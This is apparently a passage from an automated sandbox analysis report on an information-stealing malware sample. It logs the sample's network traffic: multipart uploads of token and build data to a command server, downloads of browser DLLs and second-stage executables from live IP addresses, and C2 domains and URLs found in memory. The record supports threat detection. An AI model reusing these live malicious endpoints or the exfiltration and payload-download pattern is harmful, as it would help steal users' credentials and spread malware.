45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="mode"21------GCBGIIECGHCAKECAFBFH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 147.45.68.138Content-Length: 6301Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 95.164.119.162 95.164.119.162
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: awwardwiqi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fI53unXRlZI7SNoiT9of_nEXXAJBTipPy_qdTgUGuL8-1724964759-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: traineiwnqo.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0040503C

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: awwardwiqi.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: stadiatechnologies.com
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop

Source: unknown

Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://147.45.68.138:80e
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe1kkkk1035441http://147.45.44.104/prog/66d0cd9a65b5d
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exeorm-data;
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exem-data;
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/(
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/G=6f
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/KEBGI
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/b=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/mozglue.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/mozglue.dll%
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dll?
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dll9b
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dllhb
Source: RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/p
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/softokn3.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllLbz
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllurer
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/u~
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/vcruntime140.dll
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80790dee73nt-Disposition:
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:808/2024
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80AE
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80AFsrss.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80CA
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80e
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80form-data;
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80hellohttps://steamcommunity.com/profiles/76561199761128941b
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80ocal
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
